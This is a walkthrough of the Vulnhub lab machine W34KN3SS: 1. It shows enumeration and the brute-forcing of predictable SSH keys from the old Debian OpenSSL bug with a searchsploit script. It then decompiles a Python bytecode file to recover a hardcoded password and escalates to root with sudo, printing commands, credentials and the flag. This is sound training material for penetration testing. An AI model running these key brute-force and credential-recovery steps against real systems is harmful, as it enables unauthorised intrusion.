Vulnhub - W34KN3SS: 1
Introduction
The matrix is controlling this machine, neo is trying to escape from it and take back the control on it , your goal is to help neo to gain access as a “root” to this machine , through this machine you will need to perform a hard enumration on the target and understand what is the main idea of it , and exploit every possible “weakness” that you can found , also you will be facing some upnormal behaviours during exploiting this machine.
This machine was made for Jordan’s Top hacker 2018 CTF , we tried to make it simulate a real world attacks “as much as possible” in order to improve your penetration testing skills , also we but a little tricky techniques on it so you can learn more about some unique skills.
Difficulty: Intermediate , you need to think out of the box and collect all the puzzle pieces in order to get the job done.
This box is on the NetSecFocus Admin list of OSCP-like machines. It’s W34KN3SS: 1 from vulnhub. It’s got a mild Matrix theme.
Ports
This box has SSH, HTTP and HTTPS on the standard ports (22, 80 and 443). A detail scan, or viewing the SSL certificate, gives some useful information:
Organization weakness.jth
Common Name weakness.jth
Email Address n30@weakness.jth
I add weakness.jth to /etc/hosts.
HTTP/HTTPS and hints
I enumerate the webservices with gobuster and turn up some things:
At https://192.168.1.106/test/ we get a meme with some text:
it’s all about keys :D
At http://weakness.jth/ we get a message from n30 - same user as in the email address on the SSL certificate.
At http://weakness.jth/private/ we find an SSH public key and a note, with the text:
this key was generated by openssl 0.9.8c-1
OpenSSL
This version of OpenSSL had a bug that reduced the available keyspace:
When creating a new OpenSSH key, there are only 32,767 possible outcomes for a given architecture, key size, and key type.
This means that we can try all possible keys to see if one works, hence the hint about needing lots of keys. I used the python exploit code from searchsploit:
root@kali:/opt/vulnhub/w34kn3ss# python 5720.py ./5622/rsa/2048/ 192.168.1.106 root 22 5
Which found a working key for our user n30:
Key Found in file: 4161de56829de2fe64b9055711f531c1-2537
Execute: ssh -ln30 -p22 -i ./5622/rsa/2048//4161de56829de2fe64b9055711f531c1-2537 192.168.1.106
Tested 3429 keys | Remaining 29339 keys | Aprox. Speed 15/sec
# ssh -ln30 -p22 -i ./5622/rsa/2048//4161de56829de2fe64b9055711f531c1-2537 192.168.1.106
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
New release '20.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue Aug 14 13:29:20 2018 from 192.168.209.1Privesc
Our user n30 is a member of the sudo group and in his home directory is an interesting file called code. The file is a compiled python script:
n30@W34KN3SS:~$ file code
code: python 2.7 byte-compiledIf we run it, we get this:
n30@W34KN3SS:~$ which python
/usr/bin/python
n30@W34KN3SS:~$ python code
[+]System Started at : Wed Nov 18 12:28:29 2020
[+]This binary should generate unique hash for the hardcoded login info
[+]Generating the hash ..
[+]Your new hash is : 9d3318d8beb128b1c85c9590fbf12c695b4a23ad7040492f67b59d4c4c28f858
[+]DoneDid someone say hardcoded login info?
Uncompyle
I copy the binary over to kali and try to run uncompyle6 on it; that’s failing for some reason. There is something going on with python versions but it’s not immediately clear what. Instead what I do is setup a python virtual environment, clone the uncompyle2 repo from GitHub into it and then decompile the file there so I’ve got no mix ups with versions. The sequence of commands was broadly this (taken from my bash history):
2038 apt-get install python3-venv
2067 mkdir uncompyle2
2068 cd uncompyle2
2069 git clone https://github.com/wibiti/uncompyle2 .
2071 virtualenv -p /usr/bin/python2.7 venv2
2072 source venv2/bin/activate
2073 ls
2074 python setup.py install
2075 uncompyle2 /opt/vulnhub/w34kn3ss/code
2076 uncompyle2 /opt/vulnhub/w34kn3ss/code > out
2077 ls
2078 file out
2079 cat outSo what’s in out? Effectively it’s our credentials, with some other stuff that’s not important:
n30:dMASDNB!!#B!#!#33
Privesc
With our credentials and being a member of the sudo group it’s game over:
n30@W34KN3SS:~$ sudo su
[sudo] password for n30:
root@W34KN3SS:/home/n30# cd /root
root@W34KN3SS:~# ls -lash
total 44K
4.0K drwx------ 4 root root 4.0K Aug 14 2018 .
4.0K drwxr-xr-x 22 root root 4.0K May 5 2018 ..
4.0K -rw------- 1 root root 6 Aug 14 2018 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
4.0K drwx------ 2 root root 4.0K Aug 14 2018 .cache
4.0K drwxr-xr-x 3 root root 4.0K May 5 2018 .local
4.0K -rw------- 1 root root 114 May 5 2018 .mysql_history
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw------- 1 root root 1.0K May 5 2018 .rnd
4.0K -rw-r--r-- 1 root root 33 May 8 2018 root.txt
4.0K -rw-r--r-- 1 root root 66 Aug 14 2018 .selected_editor
root@W34KN3SS:~# cat root.txt
a1d2fab76ec6af9b651d4053171e042eGoodbye, Mr Anderson.